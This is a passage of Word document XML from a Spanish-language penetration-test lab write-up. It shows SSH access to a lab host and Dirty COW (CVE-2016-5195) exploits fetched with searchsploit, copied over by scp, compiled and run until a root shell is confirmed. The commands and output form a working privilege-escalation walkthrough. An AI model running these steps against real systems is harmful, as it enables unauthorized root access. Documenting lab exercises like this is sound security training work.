          <w:right w:val="single" w:color="0B1020" w:sz="2"/>
          <w:insideH w:val="single" w:color="0B1020" w:sz="2"/>
          <w:insideV w:val="single" w:color="0B1020" w:sz="2"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9360"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9360"/>
            <w:shd w:fill="0B1020" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="150"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="150"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="4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$ ssh -i smbuser_key smbuser@192.168.56.104</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="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[smbuser@fileserver ~]$ id   # uid=1000(smbuser)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="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[smbuser@fileserver ~]$ uname -a   # Linux ... 3.10.0-229.el7 ... 2015</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="D4DAE6" w:sz="2"/>
          <w:bottom w:val="single" w:color="D4DAE6" w:sz="2"/>
          <w:left w:val="single" w:color="D4DAE6" w:sz="2"/>
          <w:right w:val="single" w:color="D4DAE6" w:sz="2"/>
        </w:pBdr>
        <w:spacing w:after="30" w:before="10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5B6472"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">Paso 18 · Acceso inicial como smbuser y kernel vulnerable identificado.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E4477A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">07</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="E4477A" w:sz="18"/>
        </w:pBdr>
        <w:spacing w:after="150" w:before="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="14203A"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">Fase IV — Escalada de privilegios</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="14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El kernel 3.10.0-229 es anterior al parche de </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="222A35"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Dirty COW (CVE-2016-5195)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, una condición de carrera que permite a un usuario sin privilegios escribir en archivos de solo lectura y obtener root.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="1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E4477A" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">PASO 19</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="14203A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">  Confirmación de la vulnerabilidad</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="0" w:line="288"/>
      </w:pP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searchsploit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confirmó exploits públicos aplicables a la versión del objetivo.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="pct" w:w="100%"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="0B1020" w:sz="2"/>
          <w:left w:val="single" w:color="0B1020" w:sz="2"/>
          <w:bottom w:val="single" w:color="0B1020" w:sz="2"/>
          <w:right w:val="single" w:color="0B1020" w:sz="2"/>
          <w:insideH w:val="single" w:color="0B1020" w:sz="2"/>
          <w:insideV w:val="single" w:color="0B1020" w:sz="2"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9360"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9360"/>
            <w:shd w:fill="0B1020" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="150"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="150"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="4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$ searchsploit dirty cow</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="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$ searchsploit proftpd 1.3.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="D4DAE6" w:sz="2"/>
          <w:bottom w:val="single" w:color="D4DAE6" w:sz="2"/>
          <w:left w:val="single" w:color="D4DAE6" w:sz="2"/>
          <w:right w:val="single" w:color="D4DAE6" w:sz="2"/>
        </w:pBdr>
        <w:spacing w:after="30" w:before="10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5B6472"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">Paso 19 · Exploits disponibles confirmados con searchsploit.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="1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E4477A" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">PASO 20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="14203A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">  Transferencia del exploit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="10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El exploit se descargó en Kali y se transfirió al objetivo por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scp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, usando la llave SSH ya obtenida.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="pct" w:w="100%"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="0B1020" w:sz="2"/>
          <w:left w:val="single" w:color="0B1020" w:sz="2"/>
          <w:bottom w:val="single" w:color="0B1020" w:sz="2"/>
          <w:right w:val="single" w:color="0B1020" w:sz="2"/>
          <w:insideH w:val="single" w:color="0B1020" w:sz="2"/>
          <w:insideV w:val="single" w:color="0B1020" w:sz="2"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9360"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9360"/>
            <w:shd w:fill="0B1020" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="150"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="150"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="4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$ searchsploit -m 40839</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="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$ scp -i smbuser_key 40839.c smbuser@192.168.56.104:/tmp/dirty.c</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="D4DAE6" w:sz="2"/>
          <w:bottom w:val="single" w:color="D4DAE6" w:sz="2"/>
          <w:left w:val="single" w:color="D4DAE6" w:sz="2"/>
          <w:right w:val="single" w:color="D4DAE6" w:sz="2"/>
        </w:pBdr>
        <w:spacing w:after="30" w:before="10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5B6472"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">Paso 20 · Exploit transferido al objetivo por scp.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="1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E4477A" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">PASO 21</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="14203A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">  Primer intento (exploit 40839)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="10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Se compiló y ejecutó la variante de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/etc/passwd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(FireFart). El exploit inició la condición de carrera (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Complete line: firefart:...:0:0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), pero…</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="pct" w:w="100%"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="0B1020" w:sz="2"/>
          <w:left w:val="single" w:color="0B1020" w:sz="2"/>
          <w:bottom w:val="single" w:color="0B1020" w:sz="2"/>
          <w:right w:val="single" w:color="0B1020" w:sz="2"/>
          <w:insideH w:val="single" w:color="0B1020" w:sz="2"/>
          <w:insideV w:val="single" w:color="0B1020" w:sz="2"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9360"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9360"/>
            <w:shd w:fill="0B1020" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="150"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="150"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="4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[smbuser@fileserver tmp]$ gcc -pthread dirty.c -o dirty -lcrypt</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="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[smbuser@fileserver tmp]$ ./dirty Password123</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="D4DAE6" w:sz="2"/>
          <w:bottom w:val="single" w:color="D4DAE6" w:sz="2"/>
          <w:left w:val="single" w:color="D4DAE6" w:sz="2"/>
          <w:right w:val="single" w:color="D4DAE6" w:sz="2"/>
        </w:pBdr>
        <w:spacing w:after="30" w:before="10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5B6472"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">Paso 21 · Ejecución de Dirty COW (40839): condición de carrera en curso.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="1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E4477A" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">PASO 22</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="14203A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">  La sesión se reinicia</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="10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…la explotación desestabilizó el servicio SSH y la conexión se reinició antes de completar la escritura. Al reconectar, el usuario root no se había creado (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su: user firefart does not exist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).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="D4DAE6" w:sz="2"/>
          <w:bottom w:val="single" w:color="D4DAE6" w:sz="2"/>
          <w:left w:val="single" w:color="D4DAE6" w:sz="2"/>
          <w:right w:val="single" w:color="D4DAE6" w:sz="2"/>
        </w:pBdr>
        <w:spacing w:after="30" w:before="10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5B6472"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">Paso 22 · La condición de carrera reinicia la sesión sin completar.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="1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E4477A" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">PASO 23</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="14203A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">  Diagnóstico del entorno</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="10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Dirty COW requiere concurrencia real. Con una sola CPU la carrera no se ganaba. Se verificó y se asignaron más núcleos a la máquina víctima (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nproc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= 3).</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="pct" w:w="100%"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="0B1020" w:sz="2"/>
          <w:left w:val="single" w:color="0B1020" w:sz="2"/>
          <w:bottom w:val="single" w:color="0B1020" w:sz="2"/>
          <w:right w:val="single" w:color="0B1020" w:sz="2"/>
          <w:insideH w:val="single" w:color="0B1020" w:sz="2"/>
          <w:insideV w:val="single" w:color="0B1020" w:sz="2"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9360"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9360"/>
            <w:shd w:fill="0B1020" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="150"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="150"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="4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[smbuser@fileserver ~]$ nproc   # 1 → se amplía a 3 vCPU</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="D4DAE6" w:sz="2"/>
          <w:bottom w:val="single" w:color="D4DAE6" w:sz="2"/>
          <w:left w:val="single" w:color="D4DAE6" w:sz="2"/>
          <w:right w:val="single" w:color="D4DAE6" w:sz="2"/>
        </w:pBdr>
        <w:spacing w:after="30" w:before="10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5B6472"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">Paso 23 · Diagnóstico: la carrera no gana con una sola CPU.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="1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E4477A" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">PASO 24</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="14203A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">  Cambio a una variante más estable (40616)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="10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Con más CPU y una variante basada en PTRACE (Exploit-DB 40616), más estable en CentOS, se repitió el ataque.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="pct" w:w="100%"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="0B1020" w:sz="2"/>
          <w:left w:val="single" w:color="0B1020" w:sz="2"/>
          <w:bottom w:val="single" w:color="0B1020" w:sz="2"/>
          <w:right w:val="single" w:color="0B1020" w:sz="2"/>
          <w:insideH w:val="single" w:color="0B1020" w:sz="2"/>
          <w:insideV w:val="single" w:color="0B1020" w:sz="2"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9360"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9360"/>
            <w:shd w:fill="0B1020" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="150"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="150"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="4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$ searchsploit -m 40616</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="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$ scp -i smbuser_key 40616.c smbuser@192.168.56.104:/tmp/cow.c</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="D4DAE6" w:sz="2"/>
          <w:bottom w:val="single" w:color="D4DAE6" w:sz="2"/>
          <w:left w:val="single" w:color="D4DAE6" w:sz="2"/>
          <w:right w:val="single" w:color="D4DAE6" w:sz="2"/>
        </w:pBdr>
        <w:spacing w:after="30" w:before="10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5B6472"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">Paso 24 · Reintento con el exploit 40616 y más núcleos.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="1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E4477A" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">PASO 25</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="14203A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">  Compilación en el objetivo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="10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El exploit se compiló en la víctima (las advertencias del compilador no impiden la ejecución).</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="pct" w:w="100%"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="0B1020" w:sz="2"/>
          <w:left w:val="single" w:color="0B1020" w:sz="2"/>
          <w:bottom w:val="single" w:color="0B1020" w:sz="2"/>
          <w:right w:val="single" w:color="0B1020" w:sz="2"/>
          <w:insideH w:val="single" w:color="0B1020" w:sz="2"/>
          <w:insideV w:val="single" w:color="0B1020" w:sz="2"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9360"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9360"/>
            <w:shd w:fill="0B1020" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="150"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="150"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="4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[smbuser@fileserver tmp]$ gcc -pthread cow.c -o cow</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="D4DAE6" w:sz="2"/>
          <w:bottom w:val="single" w:color="D4DAE6" w:sz="2"/>
          <w:left w:val="single" w:color="D4DAE6" w:sz="2"/>
          <w:right w:val="single" w:color="D4DAE6" w:sz="2"/>
        </w:pBdr>
        <w:spacing w:after="30" w:before="10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5B6472"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">Paso 25 · Compilación del exploit en el objetivo.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="1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E4477A" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">PASO 26</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="14203A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">  Obtención de la shell de root</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="10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Esta vez la condición de carrera se ganó en segundos: el exploit sobrescribió temporalmente un binario SUID y abrió una </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="222A35"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">shell de root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Popping root shell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).</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="pct" w:w="100%"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="0B1020" w:sz="2"/>
          <w:left w:val="single" w:color="0B1020" w:sz="2"/>
          <w:bottom w:val="single" w:color="0B1020" w:sz="2"/>
          <w:right w:val="single" w:color="0B1020" w:sz="2"/>
          <w:insideH w:val="single" w:color="0B1020" w:sz="2"/>
          <w:insideV w:val="single" w:color="0B1020" w:sz="2"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9360"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9360"/>
            <w:shd w:fill="0B1020" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="150"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="150"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="4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[smbuser@fileserver tmp]$ ./cow</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="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DirtyCow root privilege escalation</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="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Popping root shell.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="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[root@fileserver tmp]#</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="D4DAE6" w:sz="2"/>
          <w:bottom w:val="single" w:color="D4DAE6" w:sz="2"/>
          <w:left w:val="single" w:color="D4DAE6" w:sz="2"/>
          <w:right w:val="single" w:color="D4DAE6" w:sz="2"/>
        </w:pBdr>
        <w:spacing w:after="30" w:before="10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5B6472"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">Paso 26 · “Popping root shell”: privilegios de root obtenidos.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="45506B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">08</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="45506B" w:sz="18"/>
        </w:pBdr>
        <w:spacing w:after="150" w:before="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="14203A"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">Fase V — Post-explotación y evidencia</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="1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45506B" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">PASO 27</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="14203A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">  Confirmación de privilegios</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="10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Con la shell de root se verificó el control absoluto del sistema (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uid=0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).</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="pct" w:w="100%"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="0B1020" w:sz="2"/>
          <w:left w:val="single" w:color="0B1020" w:sz="2"/>
          <w:bottom w:val="single" w:color="0B1020" w:sz="2"/>
          <w:right w:val="single" w:color="0B1020" w:sz="2"/>
          <w:insideH w:val="single" w:color="0B1020" w:sz="2"/>
          <w:insideV w:val="single" w:color="0B1020" w:sz="2"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9360"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9360"/>
            <w:shd w:fill="0B1020" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="150"/>
              <w:bottom w:type="dxa" w:w="90"/>
              <w:right w:type="dxa" w:w="150"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="4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[root@fileserver tmp]# id</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="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uid=0(root) gid=1000(smbuser) groups=0(root),1000(smbuser)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="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[root@fileserver tmp]# whoami   # root</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="D4DAE6" w:sz="2"/>
          <w:bottom w:val="single" w:color="D4DAE6" w:sz="2"/>
          <w:left w:val="single" w:color="D4DAE6" w:sz="2"/>
          <w:right w:val="single" w:color="D4DAE6" w:sz="2"/>
        </w:pBdr>
        <w:spacing w:after="30" w:before="10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5B6472"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">Paso 27 · uid=0(root): control administrativo total.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="1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45506B" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">PASO 28</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="14203A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">  Captura de la evidencia final</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
